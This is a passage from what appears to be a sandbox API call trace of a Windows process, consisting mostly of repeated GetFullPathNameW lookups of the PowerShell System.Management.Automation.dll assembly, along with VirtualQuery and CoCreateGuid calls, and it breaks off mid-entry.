0x74 [0068.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.286] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xaaeb21e1, Data2=0x784e, Data3=0x4cbd, Data4=([0]=0x81, [1]=0xe8, [2]=0x1, [3]=0xcf, [4]=0xde, [5]=0x83, [6]=0xb0, [7]=0xb1))) returned 0x0 [0068.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.288] VirtualQuery (in: lpAddress=0x12b130, lpBuffer=0x12bff0, dwLength=0x30 | out: lpBuffer=0x12bff0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.289] VirtualQuery (in: lpAddress=0x12b130, lpBuffer=0x12bff0, dwLength=0x30 | out: lpBuffer=0x12bff0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.289] VirtualQuery (in: lpAddress=0x12b1c0, lpBuffer=0x12c080, dwLength=0x30 | out: lpBuffer=0x12c080*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.290] VirtualQuery (in: lpAddress=0x12b130, lpBuffer=0x12bff0, dwLength=0x30 | out: lpBuffer=0x12bff0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.290] VirtualQuery (in: lpAddress=0x12b1c0, lpBuffer=0x12c080, dwLength=0x30 | out: lpBuffer=0x12c080*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.291] VirtualQuery (in: lpAddress=0x12b130, lpBuffer=0x12bff0, dwLength=0x30 | out: lpBuffer=0x12bff0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.291] VirtualQuery (in: lpAddress=0x12b1c0, lpBuffer=0x12c080, dwLength=0x30 | out: lpBuffer=0x12c080*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.291] VirtualQuery (in: lpAddress=0x12b130, lpBuffer=0x12bff0, dwLength=0x30 | out: lpBuffer=0x12bff0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.292] VirtualQuery (in: lpAddress=0x12b1c0, lpBuffer=0x12c080, dwLength=0x30 | out: lpBuffer=0x12c080*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.293] VirtualQuery (in: lpAddress=0x12b130, lpBuffer=0x12bff0, dwLength=0x30 | out: lpBuffer=0x12bff0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.293] VirtualQuery (in: lpAddress=0x12b1c0, lpBuffer=0x12c080, dwLength=0x30 | out: lpBuffer=0x12c080*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.293] VirtualQuery (in: lpAddress=0x12b130, lpBuffer=0x12bff0, dwLength=0x30 | out: lpBuffer=0x12bff0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.294] VirtualQuery (in: lpAddress=0x12b1c0, lpBuffer=0x12c080, dwLength=0x30 | out: lpBuffer=0x12c080*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", 